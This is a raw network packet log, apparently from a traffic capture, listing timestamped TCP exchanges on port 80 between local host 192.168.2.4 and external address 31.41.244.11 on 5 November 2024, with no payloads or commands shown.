Nov 5, 2024 18:46:09.325730085 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.325737953 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325747967 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.325774908 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.325875044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325886011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325907946 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325918913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325928926 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325928926 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.325938940 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325944901 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.325948954 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325973034 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.325983047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325999022 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325999975 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.326009989 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.326021910 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.326045036 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.326150894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.326160908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.326169968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.326179981 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.326190948 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.326201916 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.326225042 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.326244116 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.326253891 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.326267958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.326278925 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.326287985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.326289892 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.326299906 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.326313019 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.326333046 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.326386929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.326397896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.326406956 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.326431990 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.326447964 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.326514006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.326524019 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.326533079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.326543093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.326554060 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.326571941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.326582909 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.326591969 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.326592922 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.326605082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.326615095 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.326630116 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.326664925 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.344665051 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.344674110 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.344691038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.344764948 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.344793081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.344806910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.344811916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.344815969 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.344815969 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.344837904 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.344850063 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.344856024 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.344860077 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.344886065 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.344890118 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.344901085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.344914913 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.344944000 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.344983101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.344993114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345004082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345012903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345022917 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.345022917 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345031977 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345052958 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.345077038 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.345083952 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345092058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345120907 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.345149994 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.345151901 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345160961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345171928 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345182896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345194101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345201969 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.345216036 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.345240116 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.345287085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345295906 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345305920 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345323086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345330000 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.345335960 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345346928 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345351934 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345354080 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.345386028 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.345441103 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345452070 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345460892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345470905 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345484018 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.345521927 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.345545053 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345556021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345565081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345576048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345585108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345599890 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.345617056 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.345617056 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.345649958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345706940 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.345726967 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345772028 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.345935106 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345956087 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345966101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.345983028 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.345994949 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.346061945 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346071005 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346084118 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346093893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346107960 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.346152067 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346154928 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.346154928 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.346160889 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346199036 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.346266985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346276045 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346288919 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346312046 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.346330881 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.346352100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346363068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346373081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346385002 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346395016 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.346421003 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.346518993 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346529007 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346543074 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346553087 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346561909 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346565962 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.346571922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346581936 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346592903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346599102 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.346600056 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.346622944 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.346645117 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346647978 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.346694946 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346705914 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346741915 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.346770048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346780062 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346790075 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346798897 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346853018 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.346952915 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346961975 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346971035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346980095 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346988916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.346998930 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.346999884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347008944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347012043 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.347019911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347029924 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347032070 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.347043037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347050905 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347058058 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.347065926 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.347095013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.347171068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347181082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347186089 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347222090 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.347285986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347296000 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347306013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347323895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347325087 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.347336054 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347341061 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347349882 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.347383976 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.347448111 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347457886 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347466946 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347471952 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347477913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347486019 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347496033 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347511053 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347516060 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.347522020 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.347522020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347531080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347541094 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347547054 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.347552061 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347553968 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.347592115 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.347634077 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347645044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347678900 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.347695112 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347706079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347714901 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347739935 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.347754002 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.347841024 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347850084 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347860098 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347870111 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347879887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347888947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347891092 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.347898960 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347903967 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.347908974 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.347927094 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.347943068 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.395020962 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.395040035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.395050049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.395072937 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.395117044 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.444885969 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.444920063 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.444932938 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.444962978 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.444978952 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.444989920 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.444997072 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.445009947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.445018053 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.445036888 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.445076942 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.445193052 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.445204020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.445215940 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.445226908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.445238113 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.445244074 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.445275068 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.445372105 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.445525885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.445580006 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.445635080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.445740938 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.445750952 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.445760965 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.445770025 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.445797920 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.445807934 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.445812941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.445816994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.445822954 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.445825100 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.445885897 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.445902109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.445905924 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.445925951 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.445949078 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.445975065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.445983887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.445990086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.446022987 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.446041107 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.446065903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.446075916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.446085930 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.446105003 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.446120977 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.446158886 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.446175098 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.446193933 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.446216106 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.446788073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.446835041 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.446902037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.446949959 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.446989059 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.446999073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.447007895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.447032928 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.447057962 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.447120905 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.447132111 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.447137117 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.447141886 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.447150946 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.447160959 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.447180033 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.447205067 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.447218895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.447228909 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.447237968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.447257996 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.447257996 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.447277069 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.447280884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.447318077 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.447335958 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.447344065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.447355986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.447386980 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.447395086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.447407007 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.447438002 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.447451115 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.447559118 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.447570086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.447609901 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.447623014 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.447662115 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.447674036 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.447685957 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.447712898 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.447724104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.447735071 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.447761059 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.447858095 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.447869062 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.447879076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.447889090 CET	80	49804	31.41.244.11	192.168.2.4
